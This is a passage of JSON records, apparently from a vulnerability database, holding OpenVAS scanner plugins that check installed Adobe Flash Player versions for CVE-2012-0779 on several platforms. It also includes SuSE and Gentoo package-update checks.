exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n## Check for Adobe Flash Player versions prior to 10.3.183.19 and 11.2.202.235\nif( version_is_less( version:vers, test_version:\"10.3.183.19\" ) ||\n version_in_range( version:vers, test_version:\"11.0\", test_version2:\"11.2.202.233\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"10.3.183.19 or 11.2.202.235\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:37", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.", "modified": "2017-04-14T00:00:00", "published": "2012-05-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802773", "id": "OPENVAS:802773", "title": "Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_obj_code_exec_vuln_macosx.nasl 5956 2017-04-14 09:02:12Z teissa $\n#\n# Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Mac OS X)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_insight = \"The flaw is due to an error related to object confusion.\n\n NOTE: Further information is not available.\";\n\ntag_impact = \"Successful exploitation will let attackers to create crafted Flash content\n that, when loaded by the target user, will trigger an object confusion flaw\n and execute arbitrary code on the target system.\n Impact Level: System/Application\";\ntag_affected = \"Adobe Flash Player version prior to 10.3.183.19 on Mac OS X\n Adobe Flash Player version 11.x prior to 11.2.202.235 on Mac OS X\";\ntag_solution = \"Upgrade to Adobe Flash Player version 10.3.183.19 or 11.2.202.235 or later,\n For details refer, http://www.adobe.com/downloads/\";\ntag_summary = \"This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.\";\n\nif(description)\n{\n script_id(802773);\n script_version(\"$Revision: 5956 $\");\n script_cve_id(\"CVE-2012-0779\");\n script_bugtraq_id(53395);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-14 11:02:12 +0200 (Fri, 14 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 14:44:50 +0530 (Tue, 08 May 2012)\");\n script_name(\"Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/49096/\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id/1027023\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb12-09.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_require_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nflashVer = \"\";\n\n## Get the version\nflashVer = get_kb_item(\"Adobe/Flash/Player/MacOSX/Version\");\nif(!flashVer){\n exit(0);\n}\n\n## Check for Adobe Flash Player versions prior to 10.3.183.19 and 11.2.202.235\nif(version_is_less(version:flashVer, test_version:\"10.3.183.19\") ||\n version_in_range(version:flashVer, test_version:\"11.0\", test_version2:\"11.2.202.233\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:31", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.", "modified": "2019-05-17T00:00:00", "published": "2012-05-08T00:00:00", "id": "OPENVAS:1361412562310802772", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802772", "title": "Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802772\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2012-0779\");\n script_bugtraq_id(53395);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 13:53:41 +0530 (Tue, 08 May 2012)\");\n script_name(\"Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49096/\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id/1027023\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb12-09.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to create crafted Flash content\n that, when loaded by the target user, will trigger an object confusion flaw\n and execute arbitrary code on the target system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version prior to 10.3.183.19 on Windows\n Adobe Flash Player version 11.x prior to 11.2.202.235 on Windows\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version 10.3.183.19 or 11.2.202.235 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error related to object confusion.\n\n NOTE: Further information is not available.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/downloads/\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version:vers, test_version:\"10.3.183.19\" ) ||\n version_in_range( version:vers, test_version:\"11.0\", test_version2:\"11.2.202.233\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"10.3.183.19 or 11.2.202.235\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:57:28", "bulletinFamily": "scanner", "description": "Check for the Version of update", "modified": "2017-12-29T00:00:00", "published": "2012-12-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=850271", "id": "OPENVAS:850271", "title": "SuSE Update for update openSUSE-SU-2012:0594-1 (update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0594_1.nasl 8257 2017-12-29 06:29:46Z teissa $\n#\n# SuSE Update for update openSUSE-SU-2012:0594-1 (update)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"update on openSUSE 12.1, openSUSE 11.4\";\ntag_insight = \"flash-player update to 11.2.202.235 fixes a potential\n remote code execution vulnerability\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850271);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:01:54 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-0779\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2012:0594_1\");\n script_name(\"SuSE Update for update openSUSE-SU-2012:0594-1 (update)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of update\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.235~14.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.235~14.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.235~14.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE12.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.235~21.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.235~21.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.235~21.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:57", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.", "modified": "2017-04-14T00:00:00", "published": "2012-05-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802771", "id": "OPENVAS:802771", "title": "Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_obj_code_exec_vuln_lin.nasl 5956 2017-04-14 09:02:12Z teissa $\n#\n# Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_insight = \"The flaw is due to an error related to object confusion.\n\n NOTE: Further information is not available.\";\n\ntag_impact = \"Successful exploitation will let attackers to create crafted Flash content\n that, when loaded by the target user, will trigger an object confusion flaw\n and execute arbitrary code on the target system.\n Impact Level: System/Application\";\ntag_affected = \"Adobe Flash Player version prior to 10.3.183.19 on Linux\n Adobe Flash Player version 11.x prior to 11.2.202.235 on Linux\";\ntag_solution = \"Upgrade to Adobe Flash Player version 10.3.183.19 or 11.2.202.235 or later,\n For details refer, http://www.adobe.com/downloads/\";\ntag_summary = \"This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.\";\n\nif(description)\n{\n script_id(802771);\n script_version(\"$Revision: 5956 $\");\n script_cve_id(\"CVE-2012-0779\");\n script_bugtraq_id(53395);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-14 11:02:12 +0200 (Fri, 14 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 13:35:54 +0530 (Tue, 08 May 2012)\");\n script_name(\"Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Linux)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/49096/\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id/1027023\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb12-09.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_require_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nflashVer = \"\";\n\n## Get the version\nflashVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(!flashVer){\n exit(0);\n}\n\nflashVer = ereg_replace(pattern:\",\", string:flashVer, replace: \".\");\n\n## Check for Adobe Flash Player versions prior to 10.3.183.19 and 11.2.202.235\nif(version_is_less(version:flashVer, test_version:\"10.3.183.19\") ||\n version_in_range(version:flashVer, test_version:\"11.0\", test_version2:\"11.2.202.233\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:01", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2012-05-08T00:00:00", "id": "OPENVAS:1361412562310802771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802771", "title": "Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_obj_code_exec_vuln_lin.nasl 11973 2018-10-19 05:51:32Z cfischer $\n#\n# Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802771\");\n script_version(\"$Revision: 11973 $\");\n script_cve_id(\"CVE-2012-0779\");\n script_bugtraq_id(53395);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 07:51:32 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 13:35:54 +0530 (Tue, 08 May 2012)\");\n script_name(\"Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49096/\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id/1027023\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb12-09.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to create crafted Flash content\n that, when loaded by the target user, will trigger an object confusion flaw\n and execute arbitrary code on the target system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version prior to 10.3.183.19 on Linux\n Adobe Flash Player version 11.x prior to 11.2.202.235 on Linux\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version 10.3.183.19 or 11.2.202.235 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error related to object confusion.\n\n NOTE: Further information is not available.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/downloads/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nflashVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(!flashVer){\n exit(0);\n}\n\nflashVer = ereg_replace(pattern:\",\", string:flashVer, replace: \".\");\n\nif(version_is_less(version:flashVer, test_version:\"10.3.183.19\") ||\n version_in_range(version:flashVer, test_version:\"11.0\", test_version2:\"11.2.202.233\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:01", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2012-05-08T00:00:00", "id": "OPENVAS:1361412562310802773", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802773", "title": "Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_obj_code_exec_vuln_macosx.nasl 11973 2018-10-19 05:51:32Z cfischer $\n#\n# Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Mac OS X)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802773\");\n script_version(\"$Revision: 11973 $\");\n script_cve_id(\"CVE-2012-0779\");\n script_bugtraq_id(53395);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 07:51:32 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 14:44:50 +0530 (Tue, 08 May 2012)\");\n script_name(\"Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Mac OS X)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49096/\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id/1027023\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb12-09.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to create crafted Flash content\n that, when loaded by the target user, will trigger an object confusion flaw\n and execute arbitrary code on the target system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version prior to 10.3.183.19 on Mac OS X\n Adobe Flash Player version 11.x prior to 11.2.202.235 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version 10.3.183.19 or 11.2.202.235 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to\n object confusion remote code execution vulnerability.\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error related to object confusion.\n\n NOTE: Further information is not available.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/downloads/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nflashVer = get_kb_item(\"Adobe/Flash/Player/MacOSX/Version\");\nif(!flashVer){\n exit(0);\n}\n\nif(version_is_less(version:flashVer, test_version:\"10.3.183.19\") ||\n version_in_range(version:flashVer, test_version:\"11.0\", test_version2:\"11.2.202.233\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:07", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 201206-21.", "modified": "2018-10-12T00:00:00", "published": "2012-08-10T00:00:00", "id": "OPENVAS:136141256231071588", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071588", "title": "Gentoo Security Advisory GLSA 201206-21 (Adobe Flash Player)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201206_21.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71588\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0779\", \"CVE-2012-2034\", \"CVE-2012-2035\", \"CVE-2012-2036\", \"CVE-2012-2037\", \"CVE-2012-2038\", \"CVE-2012-2039\", \"CVE-2012-2040\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:22:56 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201206-21 (Adobe Flash Player)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been found in Adobe Flash Player\ncould result in the execution of arbitrary code or Denial of Service.\");\n script_tag(name:\"solution\", value:\"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-plugins/adobe-flash-11.2.202.236'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201206-21\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=414603\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=420311\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201206-21.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.236\"), vulnerable: make_list(\"lt 11.2.202.236\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:26", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 201206-21.", "modified": "2017-07-07T00:00:00", "published": "2012-08-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=71588", "id": "OPENVAS:71588", "title": "Gentoo Security Advisory GLSA 201206-21 (Adobe Flash Player)", "type": "openvas", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# 